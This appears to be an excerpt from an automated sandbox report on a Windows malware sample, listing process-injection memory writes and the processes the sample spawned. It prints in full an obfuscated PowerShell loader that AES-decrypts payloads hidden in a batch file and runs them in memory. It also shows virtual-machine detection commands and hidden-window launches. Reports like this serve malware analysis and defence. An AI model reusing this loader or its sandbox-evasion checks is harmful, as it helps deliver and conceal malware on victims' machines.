Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 780000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1250000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1410000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1430000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 980000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 6E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 470000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 490000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 430000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 420000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 440000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B421F20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B421F50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24D756E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24D75710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1F0C6720000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1F0C6750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1EBD5460000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1EBD5490000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B4448A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B4448D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B7B9BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B7B9BF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A38DBE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1FE3A940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A38DC10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1FE3BA50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1B6C0940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1B6C0990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 18FE8A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2C9A6100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2C9A6150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2E0D9CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2E0F4010000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 250A4740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 250A4AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F1ACC50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F1ACD70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F188E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DA71D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 25791060000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DA73E60000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
